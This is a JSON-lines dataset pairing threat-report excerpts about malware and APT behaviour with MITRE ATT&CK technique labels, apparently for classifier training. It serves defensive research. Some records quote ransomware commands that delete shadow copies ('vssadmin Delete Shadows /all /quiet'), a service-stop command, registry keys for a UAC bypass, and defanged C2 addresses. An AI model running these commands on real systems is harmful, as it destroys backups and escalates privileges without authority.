{"text1":"With the file written to the system, the Trojan calls the \"GetishideAbById\" SOAP action to determine whether or not the C2 server wishes to execute the newly dropped file in a hidden window. This request is followed by a call to \"GetisrunasAbById\" to determine if the Trojan should use \"runas\" to execute the downloaded executable with elevated privileges, which would display the UAC dialog for the user to click","labels":"['T1564.003']"}
{"text1":"Numbered Panda has a long list of high-profile victims and is known by a number of names including: DYNCALC, IXESHE, JOY RAT, APT-12, etc. Numbered Panda has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. Numbered Panda has targeted organizations in time-sensitive operations such as the Fukushima Reactor Incident of 2011, likely filling intelligence gaps in the ground cleanup\/mitigation operations. One of the most interesting techniques that Numbered Panda likes to use is to dynamically calculate the Command and Control (C2) port by resolving a DNS. The malware will typically use two DNS names for communication: one is used for command and control; the other is used with an algorithm to calculate the port to communicate to. There are several variations of the algorithm used to calculate the C2 port, but one of the most common is to multiply the first two octets of the IP address and add the third octet to that value. This is typically represented as: (A * B) + C \u2013 common values might be 200.2.43.X, which would result in communication on port 443. Numbered Panda will frequently use blogs or WordPress in the c2 infrastructure, which helps to make the network traffic look more legitimate. CrowdStrike has observed Numbered Panda targeting high-tech, defense contractors, media organizations, and western governments","labels":"['T1568.003']"}
{"text1":"Appending a file signature header to all encrypted data, prior to upload or download, by randomly selecting from the file types","labels":"['T1027']"}
{"text1":"Figure 5 shows the splash image displayed by the Enigma protector prior to executing the malicious payload, which is a wallpaper image available at wallpaperswide.com. The splash screen feature acts as a sandbox evasion technique, as it requires user interaction in the form of clicking the screen before the malicious code runs","labels":"['T1497.002']"}
{"text1":"Conti uses a multithreading technique to fast encrypt all the files. This routine takes seconds to just a few minutes depending on the number of files on the machine. Each sample has a unique extension that the malware adds to the encrypted files. While using Cybereason with prevention mode off to allow investigation of the ransomware execution, it is possible to see the encryption activity and the creation of new files","labels":"['T1486']"}
{"text1":"Besides of fetching a list of scanning targets, Xbash will also request C2 server via URI \u201c\/p\u201d to fetch a list of weak passwords for brute forcing","labels":"['T1110.001']"}
{"text1":"Some versions of the Orz backdoor have 32- and 64-bit embedded DLLs, stored internally as base64 strings. Their purpose is to simply run another binary. These are used as loaders for future executable payloads, using the well-known process hollowing technique. To use the MockDll, the backdoor creates a configuration .ini file like that shown in Figure 14","labels":"['T1055.012', 'T1218.010']"}
{"text1":"The shellcode loader was observed on one infected device as updater.exe with the Metasploit-style service name APTYnDS1ABEuUHEA, indicating that it was installed as a service","labels":"['T1553.002']"}
{"text1":"From one of the hosts, we discovered that the actor executed a credential harvesting tool named Responder and moved laterally using Windows commands. Lazarus overcame network segmentation, exfiltrating data from a completely isolated network segment cut off from the internet by compromising a router virtual machine, as we explain below under \u201cOvercoming network segmentation","labels":"['T1557.001']"}
{"text1":"1) If the malware was executed with the \"install\" command-line argument, which uses .NET Framwork\u2019s InstallHelper method to install the malware as a service. 3) If no arguments are provided and the malware determines it is running in a Windows environment, it saves a DLL to the system that it injects into the explorer.exe process. The injected DLL executable loads the malware\u2019s executable and runs it within memory of the explorer.exe process","labels":"['T1055.001']"}
{"text1":"This static set of characteristics, combined with the minimal use of obfuscation in their phishing attacks, may benefit organizations that are potential targets for IRON TILDEN.ToolsTaegis\u2122 XDR Adversary Software Coverage Tool","labels":"['T1221']"}
{"text1":"Browser credential stealing: Capability to steal credentials (username and password) from the installed browsers, Microsoft Internet Explorer (MSIE), and Google\u00a0Chrome browser. Figures 7\u00a0and 8 show the code sections responsible for stealing the credentials from MSIE and Chrome browser respectively","labels":"['T1555.003']"}
{"text1":"The malware then grants itself debugging privileges by modifying its security token to add SeDebugPrivilege. This step is a prerequisite for the remainder of SUNSPOT\u2019s execution, which involves reading other processes\u2019 memory","labels":"['T1134']"}
{"text1":"Interestingly, there is an option in the RC2CL module to turn off its backdoor functionality and act as a proxy. In this case, the malware turns off the Windows firewall and creates a server that relays communication between a client and C&C server, or between two clients","labels":"['T1090.001']"}
{"text1":"The legitimate application is a digitally signed sample of Kaspersky Anti-Virus (AV) 6.0 for Windows Workstations. When the Kaspersky application is run, it loads a file named msi.dll, which is located within the same directory. The XOR-decode process, which skips zeroes, uses the single-byte key 0x88","labels":"['T1574.002']"}
{"text1":"In this attack, spear phishing was used as the initial infection vector. Before launching the attack, the group studied publicly available information about the targeted organization and identified email addresses belonging to various departments of the company","labels":"['T1589.002']"}
{"text1":"In order to avoid raising suspicions from the victim, CSPY Downloader exploits a known UAC bypass technique that uses the SilentCleanup task to execute the binary with elevated privileges","labels":"['T1548.002']"}
{"text1":"If the ransomware is not executed with administrator rights or if the infected host runs Windows Vista or later, it will attempt to elevate its privileges. In short, WastedLocker uses a well-documented UAC bypass method [1] [2]. It chooses a random file (EXE\/DLL) from the Windows system32 folder and copies it to the %APPDATA% location under a different hidden filename. Next, it creates an alternate data stream (ADS) into the file named bin and copies the ransomware into it. WastedLocker then copies winsat.exe and winmm.dll into a newly created folder located in the Windows temporary folder","labels":"['T1564.001']"}
{"text1":"A service that ensures Carbon\u2019s persistency is created. Its name can either be \u201csrservice\u201d, \u201cipvpn\u201d or \u201chkmsvc\u201d depending of the operating system version running on the compromised machine","labels":"['T1543.003']"}
{"text1":"After having registered the Print Processor, PipeMon restarts the print spooler service (spoolsv.exe). As a result, the malicious print process is loaded when the spooler service starts. Note that the Print Spooler service starts at each PC startup, which ensures persistence across system resets","labels":"['T1543.003']"}
{"text1":"After patching, the threat actor can use the Skeleton Key password configured at the time of deployment to log in as any domain user. Legitimate users can still log in using their own passwords","labels":"['T1556.001']"}
{"text1":"Create a Safe Array and copy the decrypted FoggyWeb backdoor bytes to the array. It then calls the Load() function for the current application domain to load the FoggyWeb DLL into the application domain. After the FoggyWeb DLL is loaded into the current application domain, the loader invokes the following method from the DLL: Microsoft.IdentityServer.WebExtension.WebHost. Create a Safe Array and copy the decrypted FoggyWeb backdoor bytes to the array. It then calls the Load() function for the current application domain to load the FoggyWeb DLL into the application domain. After the FoggyWeb DLL is loaded into the current application domain, the loader invokes the following method from the DLL: Microsoft.IdentityServer.WebExtension.WebHost","labels":"['T1129']"}
{"text1":"In the first path, obtaining the SAML signing certificate normally entails first querying the private encryption key that resides on the AD FS container and then using that key to decrypt the signing certificate. The certificate can then be used to create illicit but valid SAML tokens that allow the actor to impersonate users, enabling them to access enterprise cloud applications and services","labels":"['T1552.004', 'T1550']"}
{"text1":"The websites contain numerous articles and content to make them seem legitimate; in some cases the websites have over 10,000 individual news articles. Volexity has found the content is largely scraped and reposted in full from various other legitimate online news outlets. This appears to be done in an automated fashion and most likely through WordPress plugins. Numerous posted articles and images can be directly tracked back to other online blogs and newspapers; sometimes the byline or even watermark in images show directly where the article was sourced. In some cases, only a small number of pages on the site contains malicious code; in other cases, the profiling code is pervasive","labels":"['T1608.004']"}
{"text1":"Checking for specific keyboards and languages is a known evasion tactic meant to avoid running on analysis systems not configured, as the actor\u2019s targeted victim would be configured","labels":"['T1614.001']"}
{"text1":"MSTIC has observed NICKEL drop their malware into existing installed software paths. They did this to make their malware appear to be files used for an installed application. The following are example paths","labels":"['T1036.005']"}
{"text1":"If the bot is running with a regular user privilege, persistence is established using the registry \u201cRun\u201d method. The loader DLL component is written to \u201c%APPDATA%\\mswinload[.]dll\u201d and a \u201cmswinload\u201d value is added to the \u201cRun\u201d key to execute ordinal #1 of the DLL with rundll32[.]exe","labels":"['T1547.001']"}
{"text1":"In order to deploy an implant for the final payload, ScarCruft uses a multi-stage binary infection scheme. As a rule, the initial dropper is created by the infection procedure. One of the most notable functions of the initial dropper is to bypass Windows UAC (User Account Control) in order to execute the next payload with higher privileges. Afterwards, the installer malware creates a downloader and a configuration file from its resource and executes it. The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload. In order to evade network level detection, the downloader uses steganography. The downloaded payload is an image file, but it contains an appended malicious payload to be decrypted","labels":"['T1548.002']"}
{"text1":"Bisonal main module The DLL (pvcu.dll) is Bisonal malware but using a different cipher for C2 communication that other publicly documented samples. Booz Allen Hamilton in 2014 and AhnLab in 2015 reported on Bisonal using a simple XOR cipher to hide the C2 address strings in the body. The Bisonal sample we observed in this case employs the RC4 cipher with the key \u201c78563412\u201d. To date, all Bisonal samples we have seen using RC4 use this same key. The oldest sample we have dates to 2014, so this variant has been in the wild for several years. Adding to the change in encryption type, a large part of the code such as network communication procedures, and the persistence method have been re-written. For example, the Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2","labels":"['T1573.001']"}
{"text1":"At the end of the encryption process, Pay2Key will also terminate the MS SQL service using the following command net stop mssqlserver > nul in order to release the files locked by the service","labels":"['T1489']"}
{"text1":"As a previous write-up on H1N1 by Arbort Networks describes, the LINK command in this instance results in H1N1 downloading and executing a file from a remotely hosted URL using WinINet HTTP requests. The loader\u00a0also has the functionality of downloading and executing a base64 encoded file contained in the response from the command and control server via the FILE command","labels":"['T1105']"}
{"text1":"PLEAD also uses CVE-2017-7269, a buffer overflow vulnerability Microsoft Internet Information Services (IIS) 6.0 to compromise the victim\u2019s server. This is another way for them to establish a new C&C or HTTP server","labels":"['T1190']"}
{"text1":"The Trojan does not encrypt the data sent via DNS beacons, rather it converts the ASCII characters into their hexadecimal values and includes these values in cleartext. The DNS beacons sent from the Helminth executable have the following structure, which is very similar to the script version","labels":"['T1132.001']"}
{"text1":"In addition, the threat actors created a scheduled task named reset, which was designed to automatically log out of their newly created account every eight hours","labels":"['T1053.005']"}
{"text1":"Wrote indicators based on observed attacker activity \u2022 Identified lateral movement, unique backdoors, credential theft, data theft, recon, persistence creation, etc","labels":"['T1053.005']"}
{"text1":"The\u00a0Conti Ransomware uses AES-256 encryption via\u00a0a\u00a0hard-coded public key. The unique factor is\u00a0the use of\u00a0multiple threads for the encryption process,\u00a0which allows\u00a0faster\u00a0encryption\u00a0as compared to other ransomwares. The ransomware\u00a0uses a\u00a0CreateIoCompletionPort()\u00a0call to create 32 thread instances which work simultaneously to encrypt files. After encryption, the ransomware\u00a0adds\u00a0extension to all the encrypted files. It can be seen in\u00a0the\u00a0image\u00a0below","labels":"['T1486']"}
{"text1":"Over a few days' span, the threat actors install remote access tools on additional systems based upon the results of the network reconnaissance. They use At.exe to schedule tasks to run self-extracting RAR archives, which install either HttpBrowser or PlugX. CTU researchers observed the threat actors collecting Cisco VPN profiles to use when accessing the victim's network via VPN (see Figure 13","labels":"['T1053.002', 'T1133']"}
{"text1":"The organizational backup server was among the first targeted. When Ryuk was detected and stopped on the backup server, the attackers used the icacls command to modify access control, giving them full control of all the system folders on the server","labels":"['T1222.001']"}
{"text1":"This thread searches for for files with the following extensions on fixed drives and sends them to C2 every 60 minutes","labels":"['T1020']"}
{"text1":"The delivery document uses the XLSX extension typically used by OpenXML documents, but the file itself is actually an OLE (XLS) document. The file extension to file type discrepancy was caused by the actor using Excel's built-in encryption capability, which stores XLSX ciphertext and the information needed for decryption in an OLE document","labels":"['T1221']"}
{"text1":"We identified new MSIL components deployed by Zebrocy. While recent Zebrocy versioning was 7.1, some of the related Zebrocy modules that drop file-stealing MSIL modules we call Covfacy were v7.0. For example, one sent out to a handful of countries identifies network drives when they are added to target systems, and then RC4-like-encrypts and writes certain file metadata and contents to a local path for later exfiltration. The stealer searches for files 60mb and less with these extensions","labels":"['T1083']"}
{"text1":"Earlier versions of UPPERCUT used the hard-coded string \u201cthis is the encrypt key\u201d for Blowfish encryption when communicating with a C2. However, in the latest version, the keys are hard-coded uniquely for each C2 address and use the C2\u2019s calculated MD5 hash to determine which key to use, as shown in Figure 10","labels":"['T1573.001']"}
{"text1":"With this approach, the luring message shown in the Figure 2 now serves another purpose. Not only does it lure the victim into enabling the macros, but it also is assigned an alternate text: \u201cfkwarning\u201d, as seen in Figure 5. The macro has code to check this attribute to make sure the luring message shape object is present. If this object is not found, the macro will exit without downloading additional payloads","labels":"['T1497']"}
{"text1":"That new instance of RegAsm.exe is then responsible for handling the brunt of the malicious activity (data harvesting, exfiltration). We can also see frequent use of \u2018Process Hollowing\u2019 as an injection method. Process Hollowing allows for the creation or manipulation of processes through which sections of memory are unmapped (hollowed) with that space then being reallocated with the desired malicious code","labels":"['T1055.012']"}
{"text1":"To deploy the file injector, the instrumentor downloads additional payloads to be injected into a benign process","labels":"['T1055.012']"}
{"text1":"The program copies itself as <Hangul full path>HncReporter.exe and changes the default program association in the registry to open HWP documents. To do so, it alters following registry values","labels":"['T1546.001']"}
{"text1":"Another tool written in Go, GoldFinder was most likely used as a custom HTTP tracer tool that logs the route or hops that a packet takes to reach a hardcoded C2 server. When launched, the malware issues an HTTP request for a hardcoded IP address (e.g. hxxps:\/\/185[.]225[.]69[.]69\/) and logs the HTTP response to a plaintext log file (e.g. loglog.txt created in the present working directory). GoldFinder uses the following hardcoded labels to store the request and response information in the log file","labels":"['T1119']"}
{"text1":"Another interesting technique this malware uses is Visual Studio\u2019s Resource Manager. This is a feature built into Visual Studio that allows one to attach basically any file to the original binary and get a pointer to its data with a few simple API calls. Siloscape uses this method to write the Tor archive to the disk, as well as the unzip binary used to open the archive. It also uses Tor to securely connect to its C2","labels":"['T1140']"}
{"text1":"The source code of SUNBURST was likely sanitized before being included in SUNSPOT. The use of generic variable names, pre-obfuscated strings, and the lack of developer comments or disabled code is similar to what could be obtained after decompiling a backdoored Orion binary, as illustrated in Figure 2, which provides a comparison between the injected source code (top) and a decompilation output (bottom","labels":"['T1027.005']"}
{"text1":"Ebury sequentially tries the generated domain names until it finds one that has a TXT record set by the operator. To verify the ownership of the domain, Ebury checks whether the TXT record can be decrypted using an RSA public key embedded in its code","labels":"['T1140']"}
{"text1":"The first backdoor that the TeleBots group relied\u00a0heavily\u00a0on was Python\/TeleBot.A, which was rewritten from Python in the Rust programming language. The functionality remains the same: it is a standard backdoor that uses the Telegram Bot API in order to receive commands from, and send responses to, the malware operator","labels":"['T1102.002']"}
{"text1":"After the extensive validation described above, the backdoor enters its main execution stage. At its core, the backdoor is a very standard one that receives instructions from the C2 server, executes those instructions, and sends back information. The type of commands that can be executed range from manipulating of registry keys, to creating processes, and deleting files, etc. effectively providing the attackers with full access to the device, especially since it\u2019s executing from a trusted, signed binary","labels":"['T1112']"}
{"text1":"Get.exe appears to be a custom tool used to scan IP-ranges for HTTP service information. NCC Group and Fox-IT decompiled the tool for analysis. This showed the tool was written in the Python scripting language and packed into a Windows executable file. Though Fox-IT didn\u2019t find any direct occurrences of the tool on the internet, the decompiled code showed strong similarities with the source code of a tool named GetHttpsInfo. GetHttpsInfo scans the internal network for HTTP & HTTPS services. The reconnaissance tool getHttpsInfo is able to discover HTTP servers within the range of a network","labels":"['T1046']"}
{"text1":"In July 2018, Unit 42 analyzed a targeted attack using a novel file type against at least one government agency in the Middle East. It was carried out by a previously unpublished threat group we track as DarkHydrus. Based on our telemetry, we were able to uncover additional artifacts leading us to believe this adversary group has been in operation with their current playbook since early 2016. Once opened, Excel will retrieve whatever object is at the URL inside the file. These files have most recently been found in use by criminals to deliver commodity RATs such as Flawed Ammyy. In DarkHydrus's case, the preferred payload retrieved in their previous attacks were exclusively open-source legitimate tools which they abuse for malicious purposes, such as Meterpreter and Cobalt Strike. However, in this instance, it appears that this group used a custom PowerShell based payload that we call RogueRobin","labels":"['T1566.001']"}
{"text1":"Some payloads leveraged DLL side loading, a technique that involves running a legitimate, typically digitally signed, program that loads a malicious DLL. The DLL acts as a stub loader, which loads and executes shell code. BRONZE UNION previously used this technique to enable execution of PlugX and HttpBrowser tools in a way that is challenging for network defenders to detect","labels":"['T1574.002']"}
{"text1":"To execute the main downloaded payload, the loader tries to masquerade as a legitimate Windows service, claiming in its fake description, that it is used to support packed applications","labels":"['T1036.004']"}
{"text1":"Prior to downloading secondary payloads, CSPY Downloader initiates an extensive series of checks to determine if it is being debugged or running in a virtual environment, by searching for specific virtualization-related loaded modules, the process PEB structure, various file paths, registry keys, and memory","labels":"['T1497.001']"}
{"text1":"When executed, the malware first establishes a SOCKS5 connection to 192.157.198.103 using TCP port 1913. The malware sends the SOCKS5 connection request \"05 01 00\" and verifies the server response starts with \"05 00\". The malware then requests a connection to 192.184.60.229 on TCP port 81 using the command \"05 01 00 01 c0 b8 3c e5 00 51\" and verifies that the first two bytes from the server are \"05 00\" (c0 b8 3c e5 is the IP address and 00 51 is the port in network byte order","labels":"['T1104']"}
{"text1":"PIONEER KITTEN\u2019s namesake operational characteristic is its reliance on SSH tunneling, through open-source tools such as Ngrok and the adversary\u2019s custom tool SSHMinion, for communication with implants and hands-on-keyboard activity via Remote Desktop Protocol (RDP","labels":"['T1572']"}
{"text1":"This is likely to make it appear as if nothing is amiss to the user (as high CPU usage is a red flag of cryptocurrency-mining malware","labels":"['T1014']"}
{"text1":"The VBShower backdoor has the same philosophy of the validator version of PowerShower. Its aim is to complicate forensic analysis by trying to delete all the files contained in \u201c%APPDATA%\\..\\Local\\Temporary Internet Files\\Content.Word\u201d and \u201c%APPDATA%\\..\\Local Settings\\Temporary Internet Files\\Content.Word","labels":"['T1070.004']"}
{"text1":"The VBScript in turn runs rundll32.exe, activating the Cobalt Strike DLL (step #5) using a clean parent\/child process tree completely disconnected from the SolarWinds process. Finally, the VBScript removes the previously created IFEO value to clean up any traces of execution (step #6) and also deletes the following registry keys related to HTTP proxy","labels":"['T1070', 'T1112']"}
{"text1":"The threat actor also attempted to use OWA account credentials likely acquired during an earlier phase of the intrusion. BRONZE UNION appeared to leverage other compromised infrastructure, presumably to make reentry attempts seem legitimate. This attempt illustrates the importance of thorough planning when conducting an eviction and the need for continuous vigilance for evidence of reentry","labels":"['T1133']"}
{"text1":"Next, the loader checks that it\u2019s not running in a virtualized environment (VMWare or Hyper-V) or under a debugger. For the hardware virtualization check, the loader obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list","labels":"['T1497.001']"}
{"text1":"If the bot is running as admin on Windows XP or 7, persistence is established using application shimming [1]. It uses a method very similar to the one described by FireEye in their blog post \u201cTo SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence\u201d [3]. A shim database (SDB) is created (Figure 13) to patch services[.]exe with the loader code and then installed with sdbinst[.]exe","labels":"['T1546.011']"}
{"text1":"To suppress the User Access Control (UAC) prompt that normally occurs during privilege elevation, the malware uses a UAC bypass technique first documented in August 2016. This bypass requires temporarily setting either the registry key HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command on Windows 10, or the registry key HKCU\\Software\\Classes\\mscfile\\shell\\open\\command on Windows 7 to execute the malware. Once the registry key is set, the malware launches the Windows event viewer process eventvwr.msc, which will inadvertently launch the malware set in the registry keys with elevated privileges","labels":"['T1548.002']"}
{"text1":"Malicious actors commonly maintain persistence on a victim\u2019s system by installing the malware-as-a-service. Volgmer queries the system and randomly selects a service in which to install a copy of itself. The malware then overwrites the ServiceDLL entry in the selected service's registry entry. In some cases, HIDDEN COBRA actors give the created service a pseudo-random name that may be composed of various hardcoded words","labels":"['T1543.003']"}
{"text1":"The first stage shellcode contains an interesting NOP sled with alternative instructions, which was most likely designed in such a way to avoid detection by antivirus products looking for large NOP blocks inside flash files","labels":"['T1027']"}
{"text1":"The C2 server address is not embedded directly inside Tomiris: instead, it connects to a signalization server that provides the URL and port to which the backdoor should connect. Then Tomiris sends GET requests to that URL until the C2 server responds with a JSON object of the following structure","labels":"['T1568']"}
{"text1":"First, it captures the desktop window and sets the background color to black. It then writes \"All your files are encrypted. For more information see \u201cREADME-FOR-DECRYPT.txt\" with\u00a0DrawText\u00a0API to a bitmap image and saves it as \"encr.bmp\" in the public pictures folder. Finally, it changes the desktop wallpaper to the new image using the\u00a0SystemParametersInfoAPI with the SPI_SETDESKWALLPAPER flag","labels":"['T1491.001']"}
{"text1":"FIN7 has consistently utilized legally purchased code signing certificates to sign their CARBANAK payloads. Finally, FIN7 has leveraged several new techniques that we have not observed in other CARBANAK related activity","labels":"['T1553.002']"}
{"text1":"This code invokes time twice, with a sleep in between \u2026then compares if the differences between the two calls to time match the amount of time that was system slept for. To detect sandboxes that patch (speedup) calls to sleep","labels":"['T1497.003']"}
{"text1":"At the beginning of October 2021, Proofpoint researchers identified public samples of Gamaredon RTF template injection documents which impersonated the Ukrainian Ministry of Defense. This tactic is consistent with\u00a0reporting\u00a0on this APT group that links Gamaredon to the Russian FSB operating in the Republic of Crimea and the city of Sevastopol. The files communicate with the domain pretence77.glorious[.]nonima[.]ru which also was a remote template delivery URL used by several Microsoft Office Word documents that impersonated Ukrainian government organizations. These Office files communicate with actor infrastructure using a URI pattern previously observed among Gamaredon malicious Microsoft Office phishing documents. Specifically, the Microsoft Office documents used remote template injection to retrieve malicious payload files using URIs with the directory \u201c\/ELENAPC\/principles\/\u201d on several occasions. Additionally, in several instances the resources retrieved delivered an MP3 file as a delivery resource","labels":"['T1221']"}
{"text1":"The main C2 loop starts after the initial upload of the reconnaissance data, iterating once every approximately 30 seconds. For the first five minutes, each iteration will capture a screenshot of the display and upload it to the \"normal\" subdirectory with an encoded timestamp as the filename. After the first five minutes, the screenshot uploads once every five minutes","labels":"['T1113']"}
{"text1":"Since the FoggyWeb loader version.dll is an unmanaged application, it cannot directly access the virtual runtime environment that the managed AD FS code is executed within. The loader overcomes this limitation and loads the backdoor alongside the AD FS code by leveraging the CLR hosting interfaces and APIs to access the virtual runtime environment within which the AD FS code is executed","labels":"['T1106']"}
{"text1":"The instrumentor script also performs a cleanup of the cookies for Google Chrome and Microsoft Edge browsers. This activity is performed after the implants are in place to force users to reauthenticate. This is done by simply terminating any browser processes running on the system and then deleting the cookie files on disk","labels":"['T1070.004']"}
{"text1":"If the bot is running with admin privileges on a Windows version newer than Windows 7, persistence is established using the registry \u201cimage file execution options\u201d method","labels":"['T1546.012']"}
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. Datper uses an RC4-encrypted configuration to obfuscate HTTP traffic. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - RarStar \u2014 This custom tool uploads RAR archives to a specified URL as POST data (see Figure 6). RarStar encodes the POST data using Base64 and a custom XOR algorithm. RarStar HTTP POST request. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. When exfiltration is complete, the uploader (or Datper or xxmm) immediately uses the del command to delete the RAR archives. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity","labels":"['T1573.001']"}
{"text1":"An analysis of these files found that they all leveraged a remote template injection technique that allows the documents to pull down the malicious code once they are opened. This allows the attacker to have control over what content is sent back to the victim in an otherwise benign document. Recent examples of the remote template \u201cdot\u201d file URLs these documents use include the following","labels":"['T1221']"}
{"text1":"These anti-forensic recovery commands are quite interesting and appear to make use of an undocumented feature of the vssadmin\u00a0resize command. While the first command in Figure 2 above, vssadmin Delete Shadows \/all \/quiet, is commonly used by ransomware, the command option vssadmin resize shadowstorage is rarely used. In situations where shadow copies were not created by vssadmin, but by third-party applications (such as backup software), vssadmin can display an error and not delete the backups. Try removing them with the backup application which created them. The\u00a0vssadmin resize\u00a0shadowstorage command is a \u201chack\u201d that relies on vssadmin to delete storage when the shadow copies are resized. It forces the shadow copies to be deleted regardless of their context. The command works by resizing the default shadow volume size from 10 percent to 401 MB (the minimum size is 300 MB). Then the shadow storage is set to unbounded, which allows it to use all available\u00a0disk space. The shadow copies are then deleted by calling the command vssadmin Delete Shadows \/all \/quiet a second time","labels":"['T1490']"}
{"text1":"After initialization, SUNSPOT monitors running processes for instances of MsBuild.exe, which is part of Microsoft Visual Studio development tools. Copies of MsBuild.exe are identified by hashing the name of each running process and comparing it to the corresponding value, 0x53D525. The hashing algorithm used for the comparison is ElfHash and is provided in Python in Figure 1","labels":"['T1057']"}
{"text1":"The \u201cWmiApCom.bat\u201d file is simply used to start \u201cWmiApCom\u201d, which happens to be the exact same file as the one dropped by the malicious Word documents. However, this is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware","labels":"['T1105']"}
{"text1":"Although it has only recently been launched, IcedID already uses redirection attacks. The redirection scheme IcedID uses is not a simple handover to another website with a different URL. Rather, it is designed to appear as seamless as possible to the victim. These tactics include displaying the legitimate bank\u2019s URL in the address bar and the bank\u2019s correct SSL certificate, which is made possible by keeping a live connection with the actual bank\u2019s site","labels":"['T1185']"}
{"text1":"TG-3390 uses DLL side loading, a technique that involves running a legitimate, typically digitally signed, program that loads a malicious DLL. CTU researchers have observed the threat actors employing legitimate Kaspersky antivirus variants in analyzed samples. The DLL acts as a stub loader, which loads and executes the shell code. The adversaries have used this technique to allow PlugX and HttpBrowser to persist on a system","labels":"['T1574.002']"}
{"text1":"messengers. Figures 9 and 10 show FakeM attempting to resemble MSN or Yahoo. Messenger traffic, as the first 32-bytes contain data that resemble legitimate traffic generated by these chat programs","labels":"['T1001.003']"}
{"text1":"At execution, it installs an application-defined Windows hook. The hook gets windows messages indicating when a network drive has been attached. Upon adding a network drive, the hook calls its \u201cRecordToFile\u201d file stealer method","labels":"['T1056.004']"}
{"text1":"The first way in which the malware can be launched is by hijacking a DLL. Being placed in the same folder as explorer.exe, the wrapper DLL is loaded during the Windows startup into the Windows Explorer process instead of the legitimate library located in the %windir%\\system32 folder","labels":"['T1574.001']"}
{"text1":"proxy-servers, web-servers, or software update servers. After that, these intermediary servers are used by ProjectSauron as internal proxy nodes for silent and inconspicuous data exfiltration, blending in with high volumes of legitimate traffic","labels":"['T1090.001']"}
{"text1":"As mentioned in the Hermes to Ryuk section, Ryuk uses a combination of symmetric (AES) and asymmetric (RSA) encryption to encrypt files. Without the private key provided by WIZARD SPIDER, the files cannot be decrypted and are unrecoverable. A thread is created for the encryption of each file and each file is encrypted with its own AES key. After the file has been encrypted, a file extension of .RYK is appended to the file. All directories will have a ransom note of (RyukReadMe.txt) written to the directory","labels":"['T1486']"}
{"text1":"The original variant of FakeM generates network beacons to its C2 server that begin with a 32-byte header that in most cases is meant to blend into network traffic generated by legitimate applications. Following this 32-byte header, the original variant of FakeM includes data encrypted using a custom encryption cipher that uses an XOR key of \u201cYHCRA\u201d and bit rotation between each XOR operation","labels":"['T1573.001']"}
{"text1":"Carbanak campaigns can also use legitimate programs and remote access software for command and control. They also employ standard non-application layer protocols for communication.","labels":"['T1095']"}
{"text1":"After this, the Carbanak backdoor can then be used to log keystrokes and capture screenshots, steal and delete cookies, inject malicious code on sites, and monitor various traffic. For lateral movement, the malware abuses remote and system administration tools.","labels":"['T1539', 'T1113', 'T1550.004', 'T1020.001', 'T1056.003']"}
{"text1":"For FIN7 attack routines, data can be compressed and\/or encrypted before being exfiltrated.","labels":"['T1560']"}
{"text1":"FIN7 gathers information on network shares.","labels":"['T1039']"}
{"text1":"The other infection chain involves an attached .XLS file containing an Excel formula that utilizes a PowerShell command (Figure 2) to access paste.ee, a Pastebin alternative, that accesses a second encrypted PowerShell command (Figure 3).","labels":"['T1059', 'T1566.001', 'T1059.001']"}
{"text1":"In Carbanak attacks, the groups\u2019 attacks can involve logging into services that accept remote connections and using stolen password hashes through the \u201cpass the hash\u201d method","labels":"['T1550.002', 'T1110.002']"}
{"text1":"On the other hand, FIN7 takes advantage of Mshta, a utility that can execute VBScript, and scheduled tasks to run malicious code on user systems.","labels":"['T1053.005', 'T1053', 'T1218.005']"}
{"text1":"In both Carbanak and FIN7 attacks, communication with users\u2019 compromised systems is done through bypassing firewalls or network detection systems via commonly used ports, using connection proxies to avoid direct connections to the threat group\u2019s infrastructure, employing the command-and-control channel to remotely copy files from an external system, blending in with existing network traffic by using standard application layer protocol, and taking advantage of standard cryptographic protocol to disguise command-and-control traffic.","labels":"['T1090']"}
{"text1":"Panda Stealer is deployed through spam emails posing as business quote requests to lure unwary victims into opening malicious Excel files. We have identified two infection chains: in one, an .XLSM attachment contains macros that download a loader (Figure 1). Then, the loader downloads and executes the main stealer. ","labels":"['T1598.002', 'T1566.001', 'T1137.001']"}
{"text1":"FIN7 attacks can and inject code into processes and hijack the search order used to load DLL files.","labels":"['T1574.001']"}
{"text1":"Decoding these PowerShell scripts revealed that they are used to access paste.ee URLs for easy implementation of fileless payloads. The CallByName export function in Visual Basic is used to call the load of a .NET assembly within memory from a paste.ee URL.","labels":"['T1059.005', 'T1059.001']"}
{"text1":"Carbanak also collects information on accounts, files and directories, group permissions, and registries.","labels":"['T1083']"}
{"text1":"FIN7 utilizes guardrails to restrict execution and abused utilities that allow indirect command execution that can go past security restrictions","labels":"['T1480']"}
{"text1":"After moving through the network and identifying assets to target, the next step would be to gather key data. At the collection phase, Carbanak and FIN7 campaigns harvest data from local system sources and through input and screen capture (as performed in a related campaign using the Tirion malware).","labels":"['T1113', 'T1056']"}
{"text1":"They also add programs to a startup folder that can be referenced with a registry run key. We detected a variant of the Carbanak malware that adds registry entries and keys as an autostart technique. Credentials of existing valid accounts were also abused.","labels":"['T1547.001']"}
{"text1":"Cobalt Strike was also used to continuously communicate with the main command-and-control (C&C) server.","labels":"['T1587.001', 'T1583.004']"}
{"text1":"This example of BazarLoader generated command and control (C2) activity, retrieving BazarBackdoor using HTTPS traffic from 104.248.174[.]225 over TCP port 443.","labels":"['T1043']"}
{"text1":"Use the latest attack patterns, Kubernetes (K8s) or Docker API targeting, which were featured in two reports focusing on TeamTNT operations, Black-T: New Cryptojacking Variant from TeamTNT and Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes.","labels":"['T1588.002']"}
